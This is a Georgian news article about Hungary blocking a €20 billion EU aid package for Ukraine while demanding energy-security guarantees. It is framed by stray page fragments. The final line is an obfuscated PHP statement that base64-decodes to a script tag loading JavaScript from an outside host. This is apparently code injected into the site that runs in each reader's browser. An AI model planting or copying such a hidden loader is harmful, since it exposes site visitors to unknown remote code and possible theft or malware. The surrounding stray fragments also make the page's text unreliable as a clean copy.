tube
ავერსი jaluzi

უნგრეთის მთავრობა ევროკავშირის მიერ უკრაინის დასახმარებლად გამოყოფილ დახმარების ახალ პაკეტს ბლოკავს. როგორც ცნობილია, საუბარია უკრაინისთვის 20 მილიარდი ევროს გამოყოფაზე, რომელიც ქვეყნის თავდაცვას და ეკონომიკას უნდა მოხმარდეს.

Politico-ს ინფორმაციით, პრემიერ-მინისტრ ვიქტორ ორბანის ვეტო იმ საკითხს უკავშირდება, რომელზედაც უნგრეთის მთავრობა უკვე დიდი ხანია აპელირებს. საქმე ისაა, რომ 2025 წლიდან მოყოლებული, უკრაინის გავლით ევროპაში რუსული გაზის ტრანზიტი შეწყდა, ამან კი აღმოსავლეთ ევროპის ქვეყნებს პრობლემა შეუქმნა, მათ შორის, უნგრეთს, რომელიც აქამდე რუსული გაზის იმპორტზე იყო დამოკიდებული.

ამჯერად, €20-მილიარდიანი დახმარების პაკეტის დამტკიცების სანაცვლოდ, უნგრეთი ევროკავშირის მხრიდან ენერგეტიკული უსაფრთხოების გარანტიებს ითხოვს, რათა ქვეყანა ენერგეტიკულ კრიზისში არ აღმოჩნდეს.

191
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");